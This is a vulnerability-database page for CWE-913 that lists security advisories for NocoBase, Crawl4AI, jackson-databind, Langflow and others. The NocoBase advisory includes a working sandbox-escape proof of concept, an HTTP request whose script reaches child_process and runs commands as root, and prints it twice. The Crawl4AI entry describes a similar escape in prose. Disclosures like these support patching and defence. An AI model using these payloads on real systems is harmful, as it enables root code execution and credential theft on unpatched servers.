Common Weakness Enumeration

CWE-913

Allowed-with-Review

Improper Control of Dynamically-Managed Code Resources

Abstraction: Class · Status: Incomplete

The product does not properly restrict reading from or writing to dynamically-managed code resources such as variables, objects, classes, attributes, functions, or executable instructions or statements.

159 vulnerabilities reference this CWE, most recent first.

GHSA-PX3P-VGH9-M57C

Vulnerability from github – Published: 2026-03-30 17:16 – Updated: 2026-03-31 18:50
VLAI
Summary
NocoBase Affected by Sandbox Escape to RCE via console._stdout Prototype Chain Traversal in Workflow Script Node
Details

## Summary

NocoBase's Workflow Script Node executes user-supplied JavaScript inside a Node.js vm sandbox with a custom require allowlist (controlled by WORKFLOW_SCRIPT_MODULES env var). However, the console object passed into the sandbox context exposes host-realm WritableWorkerStdio stream objects via console._stdout and console._stderr.

An authenticated attacker can traverse the prototype chain to escape the sandbox and achieve Remote Code Execution (RCE) as root.

Exploit Chain

  1. console._stdout.constructor.constructor → host-realm Function constructor
  2. Function('return process')() → Node.js process object
  3. process.mainModule.require('child_process') → unrestricted module loading
  4. child_process.execSync('id') → RCE as root

This completely bypasses the customRequire allowlist.

Impact

  • Remote Code Execution as root (uid=0) inside Docker container
  • Database credential theft (DB_PASSWORD, INIT_ROOT_PASSWORD from process.env)
  • Arbitrary file read/write via require('fs')
  • Reverse shell confirmed
  • Outbound network access for lateral movement

Proof of Concept

HTTP Request:

POST /api/flow_nodes:test Authorization: Bearer Content-Type: application/json

{ "type": "script", "config": { "content": "const Fn=console._stdout.constructor.constructor;const proc=Fn('return process')();const cp=proc.mainModule.require('child_process');return cp.execSync('id').toString().trim();", "timeout": 5000, "arguments": [] } }

Response:

{"data":{"status":1,"result":"uid=0(root) gid=0(root) groups=0(root)","log":""}}

Environment

  • Docker image: nocobase/nocobase:latest
  • NocoBase CLI: v2.0.26
  • Node.js: v20.20.1
  • OS: Debian GNU/Linux 12 (bookworm)

PoC

Got reverse shell

Screenshot 2026-03-26 at 06 09 51

Proof of concept the root privileges

Screenshot 2026-03-26 at 06 12 29

os-release demonstration

Screenshot 2026-03-26 at 06 12 54

image

App path

Screenshot 2026-03-26 at 06 14 04

Exploit Usage:

Reverse Shell Mode

tool1

Dump system information & creds

tool2

Remote Command Execution Mode

tool3

Remediation

  1. Replace Node.js vm module with isolated-vm for true V8 isolate separation
  2. Do not pass the host console object into the sandbox; create a clean proxy
  3. Run the application as a non-root user inside Docker
  4. Restrict /api/flow_nodes:test to admin-only roles

Alternative Escape Vectors

  • console._stderr.constructor.constructor (identical chain via stderr)
  • Error.prepareStackTrace + CallSite.getThis() (V8 CallSite API)

Reporter

Onurcan Genç — Independent Security Researcher, Bilkent University

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.0.27"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@nocobase/plugin-workflow-javascript"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.0.28"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34156"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-30T17:16:24Z",
    "nvd_published_at": "2026-03-31T14:16:12Z",
    "severity": "CRITICAL"
  },
  "details": "`##` Summary\n\nNocoBase\u0027s Workflow Script Node executes user-supplied JavaScript inside a Node.js `vm` sandbox with a custom `require` allowlist (controlled by `WORKFLOW_SCRIPT_MODULES` env var). However, the `console` object passed into the sandbox context exposes host-realm `WritableWorkerStdio` stream objects via `console._stdout` and `console._stderr`.\n\nAn authenticated attacker can traverse the prototype chain to escape the sandbox and achieve Remote Code Execution (RCE) as root.\n\n## Exploit Chain\n\n1. `console._stdout.constructor.constructor` \u2192 host-realm `Function` constructor\n2. `Function(\u0027return process\u0027)()` \u2192 Node.js `process` object\n3. `process.mainModule.require(\u0027child_process\u0027)` \u2192 unrestricted module loading\n4. `child_process.execSync(\u0027id\u0027)` \u2192 RCE as root\n\nThis completely bypasses the `customRequire` allowlist.\n\n## Impact\n\n- Remote Code Execution as root (uid=0) inside Docker container\n- Database credential theft (`DB_PASSWORD`, `INIT_ROOT_PASSWORD` from `process.env`)\n- Arbitrary file read/write via `require(\u0027fs\u0027)`\n- Reverse shell confirmed\n- Outbound network access for lateral movement\n\n## Proof of Concept\n\n**HTTP Request:**\n\nPOST /api/flow_nodes:test\nAuthorization: Bearer \u003cJWT_TOKEN\u003e\nContent-Type: application/json\n\n{\n  \"type\": \"script\",\n  \"config\": {\n    \"content\": \"const Fn=console._stdout.constructor.constructor;const proc=Fn(\u0027return process\u0027)();const cp=proc.mainModule.require(\u0027child_process\u0027);return cp.execSync(\u0027id\u0027).toString().trim();\",\n    \"timeout\": 5000,\n    \"arguments\": []\n  }\n}\n\n**Response:**\n\n{\"data\":{\"status\":1,\"result\":\"uid=0(root) gid=0(root) groups=0(root)\",\"log\":\"\"}}\n\n## Environment\n\n- Docker image: `nocobase/nocobase:latest`\n- NocoBase CLI: v2.0.26\n- Node.js: v20.20.1\n- OS: Debian GNU/Linux 12 (bookworm)\n\n## PoC\n\nGot reverse shell\n\n\u003cimg width=\"1300\" height=\"743\" alt=\"Screenshot 2026-03-26 at 06 09 51\" src=\"https://github.com/user-attachments/assets/fcb65346-2d98-485a-a849-153d5957c78e\" /\u003e\n\nProof of concept the root privileges\n\n\u003cimg width=\"1292\" height=\"515\" alt=\"Screenshot 2026-03-26 at 06 12 29\" src=\"https://github.com/user-attachments/assets/599cd915-d5e9-47b6-9ddb-655ae4f22d50\" /\u003e\n\nos-release demonstration\n\n\u003cimg width=\"1290\" height=\"523\" alt=\"Screenshot 2026-03-26 at 06 12 54\" src=\"https://github.com/user-attachments/assets/48030450-f2b1-4edc-a7f0-caafbf55dd00\" /\u003e\n\n\u003cimg width=\"1296\" height=\"516\" alt=\"image\" src=\"https://github.com/user-attachments/assets/f7012c09-885b-48fb-a6d4-7282c0326d0b\" /\u003e\n\nApp path\n\n\u003cimg width=\"1295\" height=\"516\" alt=\"Screenshot 2026-03-26 at 06 14 04\" src=\"https://github.com/user-attachments/assets/b4846af8-cb10-4c2a-886f-b19a120c2245\" /\u003e\n\n## Exploit Usage:\n\nReverse Shell Mode\n\n\u003cimg width=\"1299\" height=\"523\" alt=\"tool1\" src=\"https://github.com/user-attachments/assets/6c26d6f3-0ad2-4a61-9692-b150409ee569\" /\u003e\n\nDump system information \u0026 creds\n\n\u003cimg width=\"635\" height=\"591\" alt=\"tool2\" src=\"https://github.com/user-attachments/assets/08dbc231-d686-4536-8a74-272ceb5c10a8\" /\u003e\n\nRemote Command Execution Mode\n\n\u003cimg width=\"644\" height=\"467\" alt=\"tool3\" src=\"https://github.com/user-attachments/assets/fc95d89b-eff5-4eec-87b4-f6022778feec\" /\u003e\n\n\n\n## Remediation\n\n1. Replace Node.js `vm` module with `isolated-vm` for true V8 isolate separation\n2. Do not pass the host `console` object into the sandbox; create a clean proxy\n3. Run the application as a non-root user inside Docker\n4. Restrict `/api/flow_nodes:test` to admin-only roles\n\n## Alternative Escape Vectors\n\n- `console._stderr.constructor.constructor` (identical chain via stderr)\n- `Error.prepareStackTrace` + `CallSite.getThis()` (V8 CallSite API)\n\n## Reporter\n\nOnurcan Gen\u00e7 \u2014 Independent Security Researcher, Bilkent University",
  "id": "GHSA-px3p-vgh9-m57c",
  "modified": "2026-03-31T18:50:32Z",
  "published": "2026-03-30T17:16:24Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nocobase/nocobase/security/advisories/GHSA-px3p-vgh9-m57c"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34156"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nocobase/nocobase/pull/8967"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nocobase/nocobase"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nocobase/nocobase/releases/tag/v2.0.28"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "NocoBase Affected by Sandbox Escape to RCE via console._stdout Prototype Chain Traversal in Workflow Script Node"
}

GHSA-Q358-8XV4-RG52

Vulnerability from github – Published: 2022-05-24 17:29 – Updated: 2022-05-24 17:29
VLAI
Details

A vulnerability in the command-line interface in Brocade Fabric OS before Brocade Fabric OS v8.2.2a1, 8.2.2c, v7.4.2g, v8.2.0_CBN3, v8.2.1e, v8.1.2k, v9.0.0, could allow a local authenticated attacker to modify shell variables, which may lead to an escalation of privileges or bypassing the logging.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-15372"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2020-09-25T14:15:00Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability in the command-line interface in Brocade Fabric OS before Brocade Fabric OS v8.2.2a1, 8.2.2c, v7.4.2g, v8.2.0_CBN3, v8.2.1e, v8.1.2k, v9.0.0, could allow a local authenticated attacker to modify shell variables, which may lead to an escalation of privileges or bypassing the logging.",
  "id": "GHSA-q358-8xv4-rg52",
  "modified": "2022-05-24T17:29:33Z",
  "published": "2022-05-24T17:29:33Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15372"
    },
    {
      "type": "WEB",
      "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2020-1081"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-Q6H9-JC46-5C2P

Vulnerability from github – Published: 2025-12-15 03:30 – Updated: 2025-12-15 03:30
VLAI
Details

A vulnerability was determined in SamuNatsu HaloBot up to 026b01d4a896d93eaaf9d5163a287dc9f267515b. Affected is the function html_renderer of the file plugins/html_renderer/index.js of the component Inter-plugin API. Executing manipulation of the argument action can lead to dynamically-managed code resources. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The vendor was contacted early about this disclosure but did not respond in any way. This vulnerability only affects products that are no longer supported by the maintainer.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-14695"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-12-15T01:15:38Z",
    "severity": "MODERATE"
  },
  "details": "A vulnerability was determined in SamuNatsu HaloBot up to 026b01d4a896d93eaaf9d5163a287dc9f267515b. Affected is the function html_renderer of the file plugins/html_renderer/index.js of the component Inter-plugin API. Executing manipulation of the argument action can lead to dynamically-managed code resources. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The vendor was contacted early about this disclosure but did not respond in any way. This vulnerability only affects products that are no longer supported by the maintainer.",
  "id": "GHSA-q6h9-jc46-5c2p",
  "modified": "2025-12-15T03:30:18Z",
  "published": "2025-12-15T03:30:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14695"
    },
    {
      "type": "WEB",
      "url": "https://github.com/rassec2/dbcve/issues/20"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.336413"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.336413"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.705587"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-Q72C-36C3-WHH7

Vulnerability from github – Published: 2022-05-24 19:09 – Updated: 2022-05-24 19:09
VLAI
Details

There is an Improper Control of Dynamically Managing Code Resources Vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may allow attempts to remotely execute commands.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-22387"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-08-02T17:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "There is an Improper Control of Dynamically Managing Code Resources Vulnerability in Huawei Smartphone.Successful exploitation of this vulnerability may allow attempts to remotely execute commands.",
  "id": "GHSA-q72c-36c3-whh7",
  "modified": "2022-05-24T19:09:34Z",
  "published": "2022-05-24T19:09:34Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22387"
    },
    {
      "type": "WEB",
      "url": "https://consumer.huawei.com/en/support/bulletin/2021/6"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-Q76Q-X9C4-447V

Vulnerability from github – Published: 2022-06-15 00:00 – Updated: 2022-06-24 00:00
VLAI
Details

The Multipass service was found to have code paths that could be abused to cause a denial of service for authentication or authorization operations. A malicious attacker could perform an application-level denial of service attack, potentially causing authentication and/or authorization operations to fail for the duration of the attack. This could lead to performance degradation or login failures for customer Palantir Foundry environments. This vulnerability is resolved in Multipass 3.647.0. This issue affects: Palantir Foundry Multipass versions prior to 3.647.0.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-27889"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-06-14T14:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "The Multipass service was found to have code paths that could be abused to cause a denial of service for authentication or authorization operations. A malicious attacker could perform an application-level denial of service attack, potentially causing authentication and/or authorization operations to fail for the duration of the attack. This could lead to performance degradation or login failures for customer Palantir Foundry environments. This vulnerability is resolved in Multipass 3.647.0. This issue affects: Palantir Foundry Multipass versions prior to 3.647.0.",
  "id": "GHSA-q76q-x9c4-447v",
  "modified": "2022-06-24T00:00:33Z",
  "published": "2022-06-15T00:00:24Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27889"
    },
    {
      "type": "WEB",
      "url": "https://github.com/palantir/security-bulletins/blob/main/PLTRSEC-2022-02.md"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-QG33-X2C5-6P44

Vulnerability from github – Published: 2024-06-10 21:30 – Updated: 2025-01-21 18:18
VLAI
Summary
Langflow remote code execution vulnerability
Details

Langflow allows remote code execution if untrusted users are able to reach the "POST /api/v1/custom_component" endpoint and provide a Python script.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "langflow"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.0.15"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-37014"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-06-11T19:29:16Z",
    "nvd_published_at": "2024-06-10T20:15:15Z",
    "severity": "HIGH"
  },
  "details": "Langflow allows remote code execution if untrusted users are able to reach the \"POST /api/v1/custom_component\" endpoint and provide a Python script.",
  "id": "GHSA-qg33-x2c5-6p44",
  "modified": "2025-01-21T18:18:10Z",
  "published": "2024-06-10T21:30:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-37014"
    },
    {
      "type": "WEB",
      "url": "https://github.com/langflow-ai/langflow/issues/1973"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/langflow-ai/langflow"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/langflow/PYSEC-2024-177.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Langflow remote code execution vulnerability"
}

GHSA-QQF6-7934-8VV8

Vulnerability from github – Published: 2021-12-21 00:00 – Updated: 2022-01-05 00:02
VLAI
Details

Improper Access Control of Dynamically-Managed Code Resources (DLL) in Thales Sentinel Protection Installer could allow the execution of arbitrary code.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2021-42809"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-12-20T21:15:00Z",
    "severity": "HIGH"
  },
  "details": "Improper Access Control of Dynamically-Managed Code Resources (DLL) in Thales Sentinel Protection Installer could allow the execution of arbitrary code.",
  "id": "GHSA-qqf6-7934-8vv8",
  "modified": "2022-01-05T00:02:08Z",
  "published": "2021-12-21T00:00:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-42809"
    },
    {
      "type": "WEB",
      "url": "https://cpl.thalesgroup.com/fr/software-monetization/security-updates"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-QXJP-W3PJ-48M7

Vulnerability from github – Published: 2026-06-16 20:13 – Updated: 2026-06-16 20:13
VLAI
Summary
Crawl4AI: AST Sandbox Escape via gi_frame.f_back Chain - Pre-Auth RCE in Docker API
Details

Summary

The _safe_eval_expression() function in the computed fields feature uses an AST validator that only blocks attributes starting with underscore. Python generator and frame object attributes (gi_frame, f_back, f_builtins) do NOT start with underscore, enabling a complete sandbox escape to achieve arbitrary code execution.

The attack requires no authentication (JWT disabled by default) and is triggered via POST /crawl with a crafted extraction schema.

Attack Vector

An attacker sends a POST /crawl request with a JsonCssExtractionStrategy schema containing a malicious computed field expression that: 1. Creates a generator to access gi_frame 2. Walks the frame chain via f_back 3. Reaches f_builtins containing the real __import__ 4. Imports os and executes arbitrary commands

Impact

Unauthenticated remote code execution inside the Docker container. An attacker can execute arbitrary system commands, read/write files, and exfiltrate secrets.

Fix Details

  1. Removed eval() from computed field expression path entirely -- expressions now log a warning and return default value
  2. Deleted _safe_eval_expression() function and _SAFE_EVAL_BUILTINS (dead security-sensitive code)
  3. function key with Python callables still works for SDK users
  4. Replaced eval() in /config/dump with JSON-based input validated by Pydantic
  5. Fixed hook_manager sandbox: stripped __builtins__, __loader__, __spec__ from injected modules; removed getattr, setattr, type, __build_class__ from allowed builtins

Workarounds

  1. Upgrade to the patched version (recommended)
  2. Enable JWT authentication via CRAWL4AI_API_TOKEN environment variable
  3. Restrict network access to the Docker API

Credits

  • Song Binglin (q1uf3ng) - reported the AST sandbox escape
  • by111 (August829) - reported the hook sandbox __builtins__ escape and hardcoded JWT secret bypass
  • jannahopp - PR #1855 proposing eval removal
  • ntohidi - PR #1886 proposing allowlist approach
Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.8.6"
      },
      "package": {
        "ecosystem": "PyPI",
        "name": "crawl4ai"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-53753"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-16T20:13:07Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\nThe `_safe_eval_expression()` function in the computed fields feature uses an AST validator that only blocks attributes starting with underscore. Python generator and frame object attributes (`gi_frame`, `f_back`, `f_builtins`) do NOT start with underscore, enabling a complete sandbox escape to achieve arbitrary code execution.\n\nThe attack requires no authentication (JWT disabled by default) and is triggered via `POST /crawl` with a crafted extraction schema.\n\n### Attack Vector\n\nAn attacker sends a `POST /crawl` request with a `JsonCssExtractionStrategy` schema containing a malicious computed field expression that:\n1. Creates a generator to access `gi_frame`\n2. Walks the frame chain via `f_back`\n3. Reaches `f_builtins` containing the real `__import__`\n4. Imports `os` and executes arbitrary commands\n\n### Impact\n\nUnauthenticated remote code execution inside the Docker container. An attacker can execute arbitrary system commands, read/write files, and exfiltrate secrets.\n\n### Fix Details\n\n1. Removed `eval()` from computed field expression path entirely -- expressions now log a warning and return default value\n2. Deleted `_safe_eval_expression()` function and `_SAFE_EVAL_BUILTINS` (dead security-sensitive code)\n3. `function` key with Python callables still works for SDK users\n4. Replaced `eval()` in `/config/dump` with JSON-based input validated by Pydantic\n5. Fixed hook_manager sandbox: stripped `__builtins__`, `__loader__`, `__spec__` from injected modules; removed `getattr`, `setattr`, `type`, `__build_class__` from allowed builtins\n\n### Workarounds\n\n1. Upgrade to the patched version (recommended)\n2. Enable JWT authentication via `CRAWL4AI_API_TOKEN` environment variable\n3. Restrict network access to the Docker API\n\n### Credits\n\n- Song Binglin ([q1uf3ng](https://github.com/q1uf3ng)) - reported the AST sandbox escape\n- by111 ([August829](https://github.com/August829)) - reported the hook sandbox `__builtins__` escape and hardcoded JWT secret bypass\n- [jannahopp](https://github.com/jannahopp) - PR #1855 proposing eval removal\n- [ntohidi](https://github.com/ntohidi) - PR #1886 proposing allowlist approach",
  "id": "GHSA-qxjp-w3pj-48m7",
  "modified": "2026-06-16T20:13:07Z",
  "published": "2026-06-16T20:13:07Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/unclecode/crawl4ai/security/advisories/GHSA-qxjp-w3pj-48m7"
    },
    {
      "type": "WEB",
      "url": "https://github.com/unclecode/crawl4ai/pull/1855"
    },
    {
      "type": "WEB",
      "url": "https://github.com/unclecode/crawl4ai/pull/1886"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/unclecode/crawl4ai"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Crawl4AI: AST Sandbox Escape via gi_frame.f_back Chain - Pre-Auth RCE in Docker API"
}

GHSA-R3GR-CXRF-HG25

Vulnerability from github – Published: 2021-12-09 19:15 – Updated: 2024-06-25 13:47
VLAI
Summary
Serialization gadgets exploit in jackson-databind
Details

FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.SharedPoolDataSource.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.9.10.7"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "com.fasterxml.jackson.core:jackson-databind"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.0.0"
            },
            {
              "fixed": "2.9.10.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-35491"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-502",
      "CWE-913"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-04-08T21:05:38Z",
    "nvd_published_at": "2020-12-17T19:15:00Z",
    "severity": "HIGH"
  },
  "details": "FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.dbcp2.datasources.SharedPoolDataSource.",
  "id": "GHSA-r3gr-cxrf-hg25",
  "modified": "2024-06-25T13:47:22Z",
  "published": "2021-12-09T19:15:11Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35491"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/issues/2986"
    },
    {
      "type": "WEB",
      "url": "https://github.com/FasterXML/jackson-databind/commit/41b8bdb5ccc1d8edb71acf1c8234da235a24249d"
    },
    {
      "type": "WEB",
      "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/FasterXML/jackson-databind"
    },
    {
      "type": "WEB",
      "url": "https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20210122-0005"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com//security-alerts/cpujul2021.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpuApr2021.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpujan2022.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpujul2022.html"
    },
    {
      "type": "WEB",
      "url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Serialization gadgets exploit in jackson-databind"
}

GHSA-R4P4-FGJP-QXM7

Vulnerability from github – Published: 2024-03-15 18:30 – Updated: 2024-03-15 18:30
VLAI
Details

Improper Control of Dynamically-Managed Code Resources vulnerability in Logitech Logi Tune on MacOS allows Local Code Inclusion.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-2537"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-913"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2024-03-15T18:15:08Z",
    "severity": "MODERATE"
  },
  "details": "Improper Control of Dynamically-Managed Code Resources vulnerability in Logitech Logi Tune on MacOS allows Local Code Inclusion.",
  "id": "GHSA-r4p4-fgjp-qxm7",
  "modified": "2024-03-15T18:30:38Z",
  "published": "2024-03-15T18:30:38Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2537"
    },
    {
      "type": "WEB",
      "url": "https://hackerone.com/reports/2376663"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Implementation

Strategy: Input Validation

For any externally-influenced input, check the input against an allowlist of acceptable values.

Mitigation
Implementation Architecture and Design

Strategy: Refactoring

Refactor the code so that it does not need to be dynamically managed.

No CAPEC attack patterns related to this CWE.